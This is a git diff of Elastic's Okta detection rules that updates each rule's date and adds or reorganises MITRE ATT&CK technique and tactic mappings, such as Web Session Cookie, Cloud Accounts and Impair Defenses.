b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/22" integration = ["okta"] maturity = "production" -updated_date = "2025/10/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,17 +79,34 @@ data_stream.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1539/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml index 463bd891fd3..1c9ca26250d 100644 --- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml +++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/26" integration = ["okta"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -159,22 +159,25 @@ FROM logs-okta.system-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1539/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" @@ -185,3 +188,20 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml index a27b743a262..223874210c3 100644 --- a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml +++ b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,29 +113,23 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" [[rule.threat.technique.subtechnique]] id = "T1110.004" name = "Credential Stuffing" reference = "https://attack.mitre.org/techniques/T1110/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml index 72b54d82017..c44cebb4c05 100644 --- a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml +++ b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,14 +122,18 @@ FROM logs-okta.system-* METADATA _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml b/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml index 81619833eb3..dcb805b61e1 100644 --- a/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml +++ b/rules/integrations/okta/credential_access_okta_mfa_bombing_via_push_notifications.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/18" integration = ["okta"] maturity = "production" -updated_date = "2025/09/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,14 +100,31 @@ sequence by okta.actor.id with maxspan=10m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1621" name = "Multi-Factor Authentication Request Generation" reference = "https://attack.mitre.org/techniques/T1621/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml b/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml index ad755fa3b9a..e9241ff3031 100644 --- a/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml +++ b/rules/integrations/okta/credential_access_okta_potentially_successful_okta_bombing_via_push_notifications.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/05" integration = ["okta"] maturity = "production" -updated_date = "2025/09/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,14 +102,31 @@ sequence by okta.actor.id with maxspan=10m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1621" name = "Multi-Factor Authentication Request Generation" reference = "https://attack.mitre.org/techniques/T1621/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml index eef4992bb6a..ac2b3ea1aad 100644 --- a/rules/integrations/okta/credential_access_user_impersonation_access.toml +++ b/rules/integrations/okta/credential_access_user_impersonation_access.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/22" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,3 +80,20 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml index 5291da1293e..752ebc8c231 100644 --- a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,19 +81,28 @@ event.dataset:okta.system and event.action:zone.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml index c2ae0981e52..952fb62b7ca 100644 --- a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml +++ b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,22 +88,31 @@ event.dataset: okta.system [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.display_name"] diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml index afb56b6df29..b1071d0ebbe 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,19 +88,28 @@ event.dataset:okta.system and event.action:policy.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml index 497da81d4d9..a62d5f3a540 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,23 @@ event.dataset:okta.system and event.action:policy.rule.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml index d15fdf5794f..b255db54235 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/28" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,19 +88,46 @@ event.dataset:okta.system and event.action:policy.lifecycle.delete [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml index 5b253b86daa..b11ae8c912b 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,23 @@ event.dataset:okta.system and event.action:policy.rule.delete [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml index 2811f0d54cf..4c429ca0f58 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,23 @@ event.dataset:okta.system and event.action:(zone.update or network_zone.rule.dis [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml index 2be46aca15c..e2e4e61c60e 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,19 +76,28 @@ event.dataset:okta.system and event.action:policy.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml index b163bbcf480..72e4c5ff146 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,19 +85,23 @@ event.dataset:okta.system and event.action:policy.rule.update [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml index 8c9739a98ea..3dba3d705cc 100644 --- a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml +++ b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] @@ -82,41 +82,57 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.threshold] field = ["okta.actor.alternate_id"] value = 5 diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml index 121e67e54ef..86fc7707a90 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,14 +78,31 @@ event.dataset:okta.system and event.action:application.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml index ade1997e494..0735762b208 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,31 @@ event.dataset:okta.system and event.action:application.lifecycle.delete [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml index 79b6707bfb6..f630bd79c29 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,3 +91,15 @@ id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_possible_okta_dos_attack.toml b/rules/integrations/okta/impact_possible_okta_dos_attack.toml index 52c88d548de..91960faaa25 100644 --- a/rules/integrations/okta/impact_possible_okta_dos_attack.toml +++ b/rules/integrations/okta/impact_possible_okta_dos_attack.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,6 +78,7 @@ event.dataset:okta.system and event.action:(application.integration.rate_limit_e [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1498" name = "Network Denial of Service" @@ -88,9 +89,17 @@ id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" +[[rule.threat.technique.subtechnique]] +id = "T1499.002" +name = "Service Exhaustion Flood" +reference = "https://attack.mitre.org/techniques/T1499/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1499.003" +name = "Application Exhaustion Flood" +reference = "https://attack.mitre.org/techniques/T1499/003/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml index 10d46662b9a..a533da4badf 100644 --- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml +++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,17 +75,44 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.id", "cloud.account.id"] diff --git a/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml b/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml index 286487e6a10..80b6b71f2ba 100644 --- a/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml +++ b/rules/integrations/okta/initial_access_okta_fastpass_phishing.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/07" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -82,14 +82,18 @@ event.dataset:okta.system and event.category:authentication and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml index d157ea4686f..ce13789eee4 100644 --- 